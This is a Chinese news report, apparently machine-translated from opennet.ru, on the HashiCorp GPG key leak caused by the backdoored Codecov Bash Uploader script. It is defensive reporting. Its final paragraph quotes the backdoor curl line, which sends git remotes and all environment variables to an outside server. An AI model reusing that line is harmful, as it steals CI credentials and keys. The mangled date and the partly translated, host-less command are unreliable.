以開發開源工具 Vagrant、Packer、Nomad 和 Terraform 而聞名的 HashiCorp 宣布,用於創建驗證版本的數位簽章的 GPG 私鑰被洩露。 獲得 GPG 金鑰存取權限的攻擊者可能會透過使用正確的數位簽章驗證 HashiCorp 產品來對它們進行隱藏更改。 同時,該公司表示,在審計過程中,沒有發現任何試圖進行此類修改的痕跡。
目前,受損的 GPG 密鑰已被撤銷,並引入了新密鑰來取代它。 此問題僅影響使用 SHA256SUM 和 SHA256SUM.sig 檔案的驗證,並不影響透過releases.hashicorp.com 提供的 Linux DEB 和 RPM 套件的數位簽章生成,以及 macOS 和 Windows 的發布驗證機制 (AuthentiCode) 。
洩漏的發生是由於在基礎設施中使用了 Codecov Bash Uploader (codecov-bash) 腳本,該腳本旨在從持續整合系統下載覆蓋率報告。 在對Codecov公司的攻擊過程中,指定腳本中隱藏了一個後門,透過該後門將密碼和加密金鑰傳送到攻擊者的伺服器。
為了進行駭客攻擊,攻擊者利用了創建Codecov Docker 映像過程中的錯誤,這使得他們能夠提取對GCS(谷歌雲端儲存)的存取數據,這是對從codecov.io 分發的Bash Uploader 腳本進行更改所必需的網站。 這些變更於 31 月 XNUMX 日進行,兩個月內未被偵測到,並允許攻擊者提取儲存在客戶持續整合系統環境中的資訊。 使用新增的惡意程式碼,攻擊者可以獲得有關經過測試的Git 儲存庫和所有環境變數的信息,包括傳輸到持續整合系統的令牌、加密金鑰和密碼,以組織對應用程式程式碼、儲存庫和Amazon Web Services 和GitHub 等服務的存取。
除了直接呼叫之外,Codecov Bash Uploader 腳本還被用作其他上傳器的一部分,例如 Codecov-action (Github)、Codecov-circleci-orb 和 Codecov-bitrise-step,其使用者也受到該問題的影響。 建議所有使用 codecov-bash 和相關產品的使用者審核其基礎設施,並更改密碼和加密金鑰。 您可以透過以下行檢查腳本中是否存在後門:curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /上傳/v2 || 真的
來源: opennet.ru